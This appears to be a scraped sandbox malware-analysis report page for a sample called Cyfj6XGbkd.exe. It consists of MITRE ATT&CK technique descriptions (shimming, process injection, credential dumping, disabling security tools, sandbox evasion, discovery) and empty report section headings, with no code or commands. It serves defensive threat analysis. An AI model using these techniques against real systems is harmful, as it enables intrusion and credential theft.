Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Cyfj6XGbkd.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre